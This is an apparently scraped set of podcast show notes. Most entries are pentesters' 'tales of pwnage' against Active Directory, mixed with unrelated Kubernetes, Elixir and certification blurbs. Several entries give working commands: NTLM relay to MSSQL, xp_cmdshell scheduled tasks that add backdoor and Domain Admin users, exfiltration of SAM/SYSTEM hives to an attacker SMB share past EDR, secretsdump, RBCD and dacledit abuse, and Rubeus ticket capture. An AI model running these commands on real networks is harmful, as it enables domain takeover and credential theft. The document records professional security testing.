#GestaoDeVulnerabilidades #LGPD #SOC #EDR #ThreatIntelligence #CloudSecurity #Compliance #PlataformaDeSeguranca #Kubernetes #DevOps #DevSecOps #Kubicast #Containers #GetupO Kubicast é uma produção da Getup, empresa especialista em Kubernetes e projetos open source para Kubernetes. Os episódios do podcast estão nas principais plataformas de áudio digital e no YouTube.com/@getupcloud.

Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/. I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can't explain is the first relay got me a shell in the context of NT SERVICEMSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITYSYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance". Turns out a DA wasn't interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn't copy reg hives out of it – EDR was unhappy. In the end, the bizarre combo of things that did the trick was: Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' From the victim system, I did an mklink to the shadow copy: mklink /d C:tempbackup ?GLOBALROOTDeviceHarddiskVolumeShadowCopy123 From command prompt on the victim system, I authenticated to my rogue share: net use ATTACKER_IPshare /user:toteslegit DontMindMeLOL! Then I did a copy command for the first hive: copy SYSTEM my.attackingipsys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!! Finishing move: secretsdump -sam sam.test -system sys.test LOCAL

Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today's episode: Got an SA account to a SQL server through Snaffler-ing With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv I didn't have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAINa-domain-admin" /it /f …and ran it: schtasks /run /tn "TotallyFineTask"

Today's tale of pentest pwnage is a classic case of “If your head is buried in the pentest sand, pop it out for a while, touch grass, and re-enumerate what you've already enumerated, because that can lead to absolute GOLD!”

Today I talk about a subject I love while also driving me crazy at the same time: building a pentest training course! Specifically, I dissect a fun/frustrating GPO attack that I need to build very carefully so that every student can pwn it while also not breaking the domain for everybody else. I also talk about how three different flavors of AI failed me in solving a simple task.

Oh man, I'm so excited I can hardly sleep. Our new three-day (4 hours per day) training is getting closer to general release. I talk about the good/bad/ugly of putting together an attack-sensitive lab that students can abuse (but hopefully not break!), and the technical/curriculum-writing challenges that go along with it.

In this episode of The Cyber Threat Perspective, we break down the 7 critical questions every security leader should ask after a penetration test. A pentest isn't just about checking a box, it's an opportunity to assess your defenses, measure progress, and refine your strategy. We discuss how to go beyond the report, extract real value from the assessment, and ensure findings lead to meaningful action across your organization. Whether you're a CISO, IT director, or team lead, this episode will help you make every pentest count.Blog: https://offsec.blog/Youtube: https://www.youtube.com/@cyberthreatpovTwitter: https://x.com/cyberthreatpov Follow Spencer on social ⬇Spencer's Links: https://go.spenceralessi.com/mylinks Work with Us: https://securit360.com

In today's tale of pentest pwnage I talk about a cool ADCS ESC3 attack – which I also did live on this week's Tuesday TOOLSday.  I also talk about Exegol's licensing plans (and how it might break your pentest deployments if you use ProxmoxRox).

In this episode of The Cyber Threat Perspective, we highlight the pentest findings that, frankly, have no business showing up in 2025. From accounts with weak passwords and no MFA to plaintext credentials on file shares, we break down the common misconfigurations and oversights that attackers still abuse, despite years of seeing the same issues over and over again. If you're an IT admin or security leader, this episode is your checklist of what to fix yesterday.Blog: https://offsec.blog/Youtube: https://www.youtube.com/@cyberthreatpovTwitter: https://x.com/cyberthreatpov Follow Spencer on social ⬇Spencer's Links: https://go.spenceralessi.com/mylinks Work with Us: https://securit360.com

Today's fun tale of pentest pwnage discuss an attack path that would, in my opinion, probably be impossible to detect…until it's too late.

Today's tale of pentest pwnage is another great one!  We talk about: The SPNless RBCD attack (covered in more detail in this episode) Importance of looking at all “branches” of outbound permissions that your user has in BloodHound This devilishly effective MSOL-account-stealing PowerShell script (obfuscate it first!) A personal update on my frustration with ringing in my ears

Today's a fun tale of pentest pwnage where we leveraged a WinRM service ticket in combination with the shadow credentials attack, then connected to an important system using evil-winrm and make our getaway with some privileged Kerberos TGTs!  I also share an (intentionally) vague story about a personal struggle I could use your thoughts/prayers/vibes with.

Hola friends! Today's tale of pentest pwnage talks about abusing Exchange and the Azure ADSync account! Links to the discussed things: adconnectdump – for all your ADSync account dumping needs! Adam Chester PowerShell script to dump MSOL service account dacledit.py (part of Impacket) to give myself full write privileges on the MSOL sync account: dacledit.py -action ‘write' -rights ‘FullControl' -principal lowpriv -target MSOL-SYNC-ACCOUNT -dc-ip 1.2.3.4 domain.com/EXCHANGEBOX$ -k -no-pass Looking to tighten up your Exchange permissions – check out this crazy detailed post

Today we have a smattering of miscellaneous pentest tips to help you pwn all the stuff! Selective Snaffling with Snaffler The importance of having plenty of dropbox disk space – for redundant remote connectivity and PXE abuse! TGTs can be fun for SMB riffling, targeted Snaffling, netexec-ing and Evil-WinRMing!

News includes Erlang/OTP achieving OpenChain ISO certification for open source license compliance, the release of the new "Elixir Patterns" book by Hugo Barauna and Alex Koutmos, a security audit of Oban Web and Pro by Paraxial.io showing excellent results, upcoming Alchemy Conf in Portugal, and a major rewrite of the asdf version manager to Go, and more! Show Notes online - http://podcast.thinkingelixir.com/240 (http://podcast.thinkingelixir.com/240) Elixir Community News https://bsky.app/profile/theerlef.bsky.social/post/3lhc5552djc24 (https://bsky.app/profile/theerlef.bsky.social/post/3lhc5552djc24?utm_source=thinkingelixir&utm_medium=shownotes) – Erlang/OTP team announces compliance with OpenChain ISO/IEC 5230 standard for open source license compliance. https://openchainproject.org/featured/2025/02/01/erlang-otp-iso5230 (https://openchainproject.org/featured/2025/02/01/erlang-otp-iso5230?utm_source=thinkingelixir&utm_medium=shownotes) – Details about OpenChain certification and its importance for Erlang/OTP's 2025 goals for enhancing community infrastructure. https://podcast.thinkingelixir.com/220 (https://podcast.thinkingelixir.com/220?utm_source=thinkingelixir&utm_medium=shownotes) – Reference to Allistair Woodman episode providing additional context about Erlang/OTP. https://www.elixirpatterns.dev/#pricing (https://www.elixirpatterns.dev/#pricing?utm_source=thinkingelixir&utm_medium=shownotes) – New book "Elixir Patterns" by Hugo Barauna and Alex Koutmos has been released. https://bsky.app/profile/hugobarauna.com/post/3lgv5yfw5o22q (https://bsky.app/profile/hugobarauna.com/post/3lgv5yfw5o22q?utm_source=thinkingelixir&utm_medium=shownotes) – Author's announcement about the Elixir Patterns book release. https://www.elixirpatterns.dev/#free-chapters (https://www.elixirpatterns.dev/#free-chapters?utm_source=thinkingelixir&utm_medium=shownotes) – Free sample chapters of Elixir Patterns book available with accompanying Livebooks. https://www.youtube.com/watch?v=AZZvljvgKy8 (https://www.youtube.com/watch?v=AZZvljvgKy8?utm_source=thinkingelixir&utm_medium=shownotes) – Launch livestream recording for the Elixir Patterns book. https://paraxial.io/blog/oban-pentest (https://paraxial.io/blog/oban-pentest?utm_source=thinkingelixir&utm_medium=shownotes) – Security audit results for Oban Web and Oban Pro by Paraxial.io, showing no critical vulnerabilities. https://alchemyconf.com/ (https://alchemyconf.com/?utm_source=thinkingelixir&utm_medium=shownotes) – Announcement for Alchemy Conf happening April 2-3 in Braga Portugal. https://x.com/hugobarauna/status/1886766098411909420 (https://x.com/hugobarauna/status/1886766098411909420?utm_source=thinkingelixir&utm_medium=shownotes) – Hugo Barauna announces he'll be speaking about Livebook and Livebook Teams internals at Alchemy Conf. https://stratus3d.com/blog/2025/02/03/asdf-has-been-rewritten-in-go/ (https://stratus3d.com/blog/2025/02/03/asdf-has-been-rewritten-in-go/?utm_source=thinkingelixir&utm_medium=shownotes) – Announcement about asdf v0.16 major update and rewrite in Go. https://asdf-vm.com/guide/upgrading-to-v0-16.html#installation (https://asdf-vm.com/guide/upgrading-to-v0-16.html#installation?utm_source=thinkingelixir&utm_medium=shownotes) – Installation guide for the new asdf v0.16 with breaking changes. Do you have some Elixir news to share? Tell us at @ThinkingElixir (https://twitter.com/ThinkingElixir) or email at show@thinkingelixir.com (mailto:show@thinkingelixir.com) Find us online - Message the show - Bluesky (https://bsky.app/profile/thinkingelixir.com) - Message the show - X (https://x.com/ThinkingElixir) - Message the show on Fediverse - @ThinkingElixir@genserver.social (https://genserver.social/ThinkingElixir) - Email the show - show@thinkingelixir.com (mailto:show@thinkingelixir.com) - Mark Ericksen on X - @brainlid (https://x.com/brainlid) - Mark Ericksen on Bluesky - @brainlid.bsky.social (https://bsky.app/profile/brainlid.bsky.social) - Mark Ericksen on Fediverse - @brainlid@genserver.social (https://genserver.social/brainlid) - David Bernheisel on Bluesky - @david.bernheisel.com (https://bsky.app/profile/david.bernheisel.com) - David Bernheisel on Fediverse - @dbern@genserver.social (https://genserver.social/dbern)

Today we've got some super cool stuff to cover today!  First up, BPATTY v1.4 is out and has a slug of cool things: A whole new section on old-school wifi tools like airmon-ng, aireplay-ng and airodump-ng Syntax on using two different tools to parse creds from Dehashed An updated tutorial on using Gophish for phishing campaigns The cocoa-flavored cherry on top is a tale of pentest pwnage that includes: Abusing SCCM Finding gold in SQL configuration/security audits

Get your FREE 2024 Cybersecurity Salary Guide: https://www.infosecinstitute.com/form/cybersecurity-salary-guide-podcast/?utm_source=audio&utm_medium=podcast&utm_campaign=podcastIn this episode of Cyber Work Hacks, guest James Stanger from CompTIA dives into the PenTest+ certification. He explains the critical distinctions between pentesting and hacking and outlines the essential career skills involved in pentesting, such as network discovery, social engineering and vulnerability analytics. Viewers will also learn about hands-on activities to enhance their resumes and hear valuable advice for entering cybersecurity roles. The episode touches on adjacent career paths like GRC, threat hunting and vulnerability management while providing practical tips for preparing for the PenTest+ exam.00:00 - Introduction to PenTest+ certification01:02 - Overview of cybersecurity job market01:56 - Guest introduction: James Stanger from CompTIA02:33 - Deep dive into PenTest+ certification04:42 - Career paths with PenTest+ certification07:27 - Getting started in pentesting09:12 - Hands-on experience and practical tips10:58 - Study tips for PenTest+ exam11:34 - Conclusion and final thoughtsView Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast/?utm_source=audio&utm_medium=podcast&utm_campaign=podcastAbout InfosecInfosec's mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ's security awareness training. Learn more at infosecinstitute.com.

Hey friends, we've got a short but sweet tale of pentest pwnage for you today. Key lessons learned: Definitely consider BallisKit for your EDR-evasion needs If you get local admin to a box, enumerate, enumerate, enumerate!  There might be a delicious task or service set to run as a domain admin that can quickly escalate your privileges!

Oooooo, giggidy! Today is (once again) my favorite tale of pentest pwnage. I learned about a feature of PowerUpSQL that helped me find a “hidden” SQL account, and that account ended up being the key to the entire pentest!  I wonder how many hidden SQL accounts I've missed on past pentests….SIGH! Check out the awesome BloodHound gang thread about this here. Also, can't get Rubeus monitor mode to capture TGTs to the registry?  Try output to file instead: rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:userspublicsome-innocent-looking-file.log In the tangent department, I talk about a personal music project I'm resurrecting to help my community.